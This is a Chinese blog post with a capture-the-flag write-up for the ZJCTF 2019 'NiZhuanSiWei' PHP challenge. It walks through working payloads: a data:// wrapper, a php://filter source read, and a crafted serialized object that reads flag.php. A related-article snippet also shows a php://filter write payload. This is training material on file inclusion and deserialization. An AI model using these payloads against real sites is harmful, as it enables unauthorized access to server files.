[ZJCTF 2019]NiZhuanSiWei

最新推荐文章于 2024-03-16 07:03:33 发布
最新推荐文章于 2024-03-16 07:03:33 发布
阅读量174 收藏
点赞数
分类专栏: CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40860153/article/details/109002759
版权

1.打开题目看得到

<?php   
$text = $_GET["text"]; 
$file = $_GET["file"]; 
$password = $_GET["password"]; 
if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ 
    echo "<br><h1>".file_get_contents($text,'r')."</h1></br>"; 
    if(preg_match("/flag/",$file)){ 
        echo "Not now!"; 
        exit();  
    }else{ 
        include($file);  //useless.php 
        $password = unserialize($password); 
        echo $password; 
    } 
} 
else{ 
    highlight_file(__FILE__); 
} 
?>

从源码上分析,首先要对$text写入"welcome to the zjctf"

if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf"))

这里学习到使用data伪协议来写入

?text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=

再接着看后面:

if(preg_match("/flag/",$file)){ 
        echo "Not now!"; 
        exit();  
    }else{ 
        include($file);  //useless.php 
        $password = unserialize($password); 
        echo $password; 
    }

这里通过对$file进行正则匹配,过滤掉了flag字段,并且提示有一个useless.php
可以用php://filter协议来读取这个useless.php

?text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=&file=php://filter/read=convert.base64-encode/resource=useless.php

这时需要将得到的这段进行base64解码
在这里插入图片描述
解码结果:

<?php  

class Flag{  //flag.php  
    public $file;  
    public function __tostring(){  
        if(isset($this->file)){  
            echo file_get_contents($this->file); 
            echo "<br>";
        return ("U R SO CLOSE !///COME ON PLZ");
        }  
    }  
}  
?>

题目源码后还有:$password = unserialize($password);这里可以在本地进行序列化得到结果

<?php
 
class Flag{
    public $file='flag.php';  
    public function __tostring(){  
        if(isset($this->file)){  
            echo file_get_contents($this->file); 
            echo "<br>";
        return ("U R SO CLOSE !///COME ON PLZ");
        }  
    }  
} 
$password=new Flag();
echo serialize($password);
?>
//得到结果为:O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

这时就可以构造出最终的payload:

?text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=&file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

最终flag在源代码里
在这里插入图片描述
在这里插入图片描述

总结:
1.学习使用data伪协议写入文件
data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY=
2.学习使用php://filter读取源码
php://filter/read=convert.base64-encode/resource=useless.php
3.序列化与反序列化

HelloYo_k
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
伪协议配合回调函数写入命令
wikey 的博客
04-01 249
然后payload: GET v2=115044383959474e6864434171594473&v3=php://filter/write=convert.base64- decode/resource=1.php POST v1=hex2bin 最后访问1.php。//用来写文件进去,其中文件名参数是支持伪协议的,用于将第二个参数content进行过滤器后再写进文件里面去。v3得是一个文件把,写入一些命令执行的东西,那我们可以通过伪协议直接生成文件。当然这道题可以学到很多东西,首先我们先分析一下。
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
[ZJCTF 2019]NiZhuanSiWei 1
feng的博客
10-23 1321
知识点 文件包含与各种协议 反序列化 WP 首先进入环境,得到源码: $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ echo "<br><h1>".file_get_contents($text,'r').
buuctf [ZJCTF 2019]NiZhuanSiWei
SopRomeo的博客
03-15 1218
给了一段源码,注释如下 <?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ //判断$text变量是否...
ctf中的一道反序列化题
weixin_40709439的博客
09-27 5247
早就想写了,今天刚好遇到一道反序列化的题就记录一下 自己在本地搭的,源码如下: index1.php &lt;?php error_reporting(E_ALL &amp; ~E_NOTICE); $user = $_GET["user"]; $file = $_GET["file"]; $pass = $_GET["pass"]; if(isset($user)&amp;&amp;...
[BJDCTF2020]ZJCTF,不过如此
m0_56059226的博客
06-01 217
[BJDCTF2020]ZJCTF,不过如此 打开题目 首先是一段源代码: <?php ​ error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){ echo "<br><h1>".file_get_contents($text,'r')...
CTF中遇见的PHP伪协议运用
热门推荐
byxs007的博客
12-15 1万+
关于PHP伪协议中的总结网上已经有很多文章了 LoRexxar的PHP伪协议总结 PHP伪协议 官方文档 以下都是在做CTF题目的时候遇见的一些知识点,每遇到一点就会在这面做一些总结 php://input php://input 是个可以访问请求的原始数据的只读流。因为它不依赖于特定的 php.ini 指令。 注:enctype=”multipart/form-d
BUUCTF刷题记录 NiZhuanSiWei
m0_46576074的博客
05-18 403
[ZJCTF 2019]NiZhuanSiWei 进入网址 源码分析 if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")) 用data伪协议传参 ?text=data://text/plain;base64,d2VsY29tZSB0byB0aGUgempjdGY= 源码分析 if(preg_match("/flag/",$file)){ echo "Not now!";
nssctf刷题
weixin_63231007的博客
04-30 1052
[ZJCTF 2019]NiZhuanSiWei <?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r')==="welcome to the zjctf")){ echo "<br><h1>".file_get_contents($text,'
PHP伪协议详解
最新发布
windowshht的博客
03-16 541
PHP伪协议是一种方便的工具,可以用于读取和写入文件,以及对数据流进行过滤。使用PHP伪协议时,应注意安全性问题。不要使用PHP伪协议来执行远程文件,除非您确定该文件是安全的。使用PHP伪协议来读取远程文件时,应使用过滤器来对数据进行验证。*使用PHP伪协议来写入文件时,应确保文件具有适当的访问权限。
文件包含之伪协议的使用
qq_56438857的博客
07-29 622
之前一直对文件包含的伪协议懵懵懂懂,今天重新学了一下,一下就升华了。顺便整理了一些小笔记,供大家交流学习。
【2019】ZJCTF-Web
weixin_47813861的博客
09-20 177
不过如此 <?php error_reporting(0); $text = $_GET["text"]; $file = $_GET["file"]; if(isset($text)&&(file_get_contents($text,'r')==="I have a dream")){ echo "<br><h1>".file_get_contents($text,'r')."</h1></br>"; if(preg_

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值